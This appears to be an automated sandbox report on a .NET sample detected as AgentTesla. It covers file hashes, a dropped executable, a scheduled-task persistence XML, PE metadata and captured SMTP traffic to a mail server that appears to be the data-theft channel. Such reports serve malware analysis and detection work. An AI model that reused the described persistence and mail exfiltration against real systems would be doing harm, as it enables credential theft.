                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                            C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1657
                                                                                            Entropy (8bit):5.171744392751988
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBxItn:cbhH7MlNQ8/rydbz9I3YODOLNdq3Hu
                                                                                            MD5:A0BA831FBBF7056630F0025999E81099
                                                                                            SHA1:EE9135CFC2E30954571AC04CCBAD522711099787
                                                                                            SHA-256:DBD65606E72F7547A9144F8FDADC155620A5CD85A2D0B8828D7FEF34F3BB90CD
                                                                                            SHA-512:F901C14D010E6AD5CE3B0AE17F1DC17B70712EF525A26CBCAD9634B03703CF444DE6AE29790D411084330424F69E1058EBB09E17EC1D5CA655E5563B762B7CCC
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv
                                                                                            C:\Users\user\AppData\Roaming\mwflisJj.exe
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):547328
                                                                                            Entropy (8bit):7.505861958466946
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:yqUdZe0hZRlqMvob1sUntHhRFTJV0lCoaFJhJEYFNW4K6hPa5d:Yd5WRb1RntHhRFF+aFpE4ba5d
                                                                                            MD5:17BC24CEDB444E05E229B89CB01C2F6A
                                                                                            SHA1:AD3525D6632697DF6EA38F6F8AECAD40FA24CB59
                                                                                            SHA-256:196CB5A816D8BFB1A12710E8D6B836CDDA2DE48249C22CCB584014F4E1140B37
                                                                                            SHA-512:CBE15A6D740D6B656A5A47664686391584A153D316E7CF9400768600D444477DFF4D62DCDF7AAFA9B0DFA202E5F24D00DCE92A8477B9393BE65C295A1A57A628
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 35%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Order Specification.doc, Detection: malicious, Browse
                                                                                            Reputation:low
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L4`..............P..D...........b... ........@.. ....................................@..................................a..O....... ............................................................................ ............... ..H............text....B... ...D.................. ..`.rsrc... ............F..............@..@.reloc...............X..............@..B.................a......H........x.. S...........................................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                                                            C:\Users\user\AppData\Roaming\mwflisJj.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview: [ZoneTransfer]....ZoneId=0

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.505861958466946
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:SecuriteInfo.com.Win32.18332.exe
                                                                                            File size:547328
                                                                                            MD5:17bc24cedb444e05e229b89cb01c2f6a
                                                                                            SHA1:ad3525d6632697df6ea38f6f8aecad40fa24cb59
                                                                                            SHA256:196cb5a816d8bfb1a12710e8d6b836cdda2de48249c22ccb584014f4e1140b37
                                                                                            SHA512:cbe15a6d740d6b656a5a47664686391584a153d316e7cf9400768600d444477dff4d62dcdf7aafa9b0dfa202e5f24d00dce92a8477b9393be65c295a1a57a628
                                                                                            SSDEEP:12288:yqUdZe0hZRlqMvob1sUntHhRFTJV0lCoaFJhJEYFNW4K6hPa5d:Yd5WRb1RntHhRFF+aFpE4ba5d
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L4`..............P..D...........b... ........@.. ....................................@................................

                                                                                            File Icon

                                                                                            Icon Hash:00828e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x486212
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                            Time Stamp:0x60344C8F [Tue Feb 23 00:30:07 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x861c00x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x1020.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x842180x84400False0.780496810019data7.52059218379IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x880000x10200x1200False0.361111111111data4.72346408256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_VERSION0x880900x36cdata
                                                                                            RT_MANIFEST0x8840c0xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            Translation0x0000 0x04b0
                                                                                            LegalCopyrightCopyright 2018
                                                                                            Assembly Version1.0.0.0
                                                                                            InternalNameStaticArrayInitTypeSize5264.exe
                                                                                            FileVersion1.0.0.0
                                                                                            CompanyName
                                                                                            LegalTrademarks
                                                                                            Comments
                                                                                            ProductNameRegisterVB
                                                                                            ProductVersion1.0.0.0
                                                                                            FileDescriptionRegisterVB
                                                                                            OriginalFilenameStaticArrayInitTypeSize5264.exe

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 23, 2021 11:52:13.143026114 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:13.338929892 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.339251041 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:13.534706116 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.535196066 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:13.729146004 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.729871988 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.730170965 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:13.923871994 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.970978975 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:13.978475094 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.172343969 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.173898935 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.173923969 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.173940897 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.173959970 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.174026966 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.174166918 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.207317114 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.402728081 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.403785944 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.455311060 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.474832058 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.668787956 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.668898106 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.670490980 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:14.864357948 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.865232944 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:14.865813971 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.059612989 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.061528921 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.062896013 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.256997108 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.260499001 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.261051893 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.455931902 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.482764006 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.483614922 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.678585052 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.679266930 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.682666063 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.682713985 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.683370113 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.683393002 CET49746587192.168.2.7198.54.122.60
                                                                                            Feb 23, 2021 11:52:15.878041029 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.878083944 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.878359079 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.925540924 CET58749746198.54.122.60192.168.2.7
                                                                                            Feb 23, 2021 11:52:15.971385956 CET49746587192.168.2.7198.54.122.60

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 23, 2021 11:50:23.811175108 CET6050153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:23.860960960 CET53605018.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:25.098064899 CET5377553192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:25.149621964 CET53537758.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:26.393460989 CET5183753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:26.442301035 CET53518378.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:27.651771069 CET5541153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:27.686242104 CET6366853192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:27.701731920 CET53554118.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:27.745866060 CET53636688.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:28.513994932 CET5464053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:28.571127892 CET53546408.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:30.272234917 CET5873953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:30.320895910 CET53587398.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:31.550720930 CET6033853192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:31.601206064 CET53603388.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:34.354324102 CET5871753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:34.404059887 CET53587178.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:36.214714050 CET5976253192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:36.271579027 CET53597628.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:37.601356030 CET5432953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:37.650216103 CET53543298.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:38.998533010 CET5805253192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:39.048562050 CET53580528.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:40.317584038 CET5400853192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:40.377026081 CET53540088.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:50:44.937572002 CET5945153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:50:45.000644922 CET53594518.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:00.104533911 CET5291453192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:00.155673981 CET53529148.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:00.890769005 CET6456953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:00.939450026 CET53645698.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:02.013605118 CET5281653192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:02.065471888 CET53528168.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:03.370759010 CET5078153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:03.422497034 CET53507818.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:04.898988008 CET5423053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:04.950506926 CET53542308.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:07.428805113 CET5491153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:07.477519035 CET53549118.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:08.252623081 CET4995853192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:08.301198006 CET53499588.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:09.520267963 CET5086053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:09.571837902 CET53508608.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:10.713102102 CET5045253192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:10.762620926 CET53504528.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:19.694299936 CET5973053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:19.744422913 CET53597308.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:19.949497938 CET5931053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:20.037695885 CET53593108.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:20.579699993 CET5191953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:20.638678074 CET53519198.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:20.793133020 CET6429653192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:20.841919899 CET53642968.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:21.197024107 CET5668053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:21.270200968 CET53566808.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:21.443562031 CET5882053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:21.517549038 CET53588208.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:21.761512995 CET6098353192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:21.835552931 CET53609838.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:22.346087933 CET4924753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:22.403258085 CET53492478.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:22.988387108 CET5228653192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:23.037136078 CET53522868.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:23.702756882 CET5606453192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:23.754462957 CET53560648.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:24.593436003 CET6374453192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:24.653460979 CET53637448.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:25.557543039 CET6145753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:25.609128952 CET53614578.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:26.416088104 CET5836753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:26.477566004 CET53583678.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:27.024074078 CET6059953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:27.083892107 CET53605998.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:58.400424004 CET5957153192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:58.450644016 CET53595718.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:51:58.903446913 CET5268953192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:51:58.960867882 CET53526898.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:52:13.053006887 CET5029053192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:52:13.112916946 CET53502908.8.8.8192.168.2.7
                                                                                            Feb 23, 2021 11:52:21.805238008 CET6042753192.168.2.78.8.8.8
                                                                                            Feb 23, 2021 11:52:21.856945992 CET53604278.8.8.8192.168.2.7

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Feb 23, 2021 11:52:13.053006887 CET192.168.2.78.8.8.80x57abStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Feb 23, 2021 11:52:13.112916946 CET8.8.8.8192.168.2.70x57abNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                                            SMTP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Feb 23, 2021 11:52:13.534706116 CET58749746198.54.122.60192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                            Feb 23, 2021 11:52:13.535196066 CET49746587192.168.2.7198.54.122.60EHLO 724536
                                                                                            Feb 23, 2021 11:52:13.729871988 CET58749746198.54.122.60192.168.2.7250-mta-14.privateemail.com
                                                                                            250-PIPELINING
                                                                                            250-SIZE 81788928
                                                                                            250-ETRN
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-ENHANCEDSTATUSCODES
                                                                                            250-8BITMIME
                                                                                            250 STARTTLS
                                                                                            Feb 23, 2021 11:52:13.730170965 CET49746587192.168.2.7198.54.122.60STARTTLS
                                                                                            Feb 23, 2021 11:52:13.923871994 CET58749746198.54.122.60192.168.2.7220 Ready to start TLS

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6660 Parent PID: 5748

                                                                                            General

                                                                                            Start time:11:50:30
                                                                                            Start date:23/02/2021
                                                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe'
                                                                                            Imagebase:0xdb0000
                                                                                            File size:547328 bytes
                                                                                            MD5 hash:17BC24CEDB444E05E229B89CB01C2F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.258031189.00000000044E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Chronological Activities

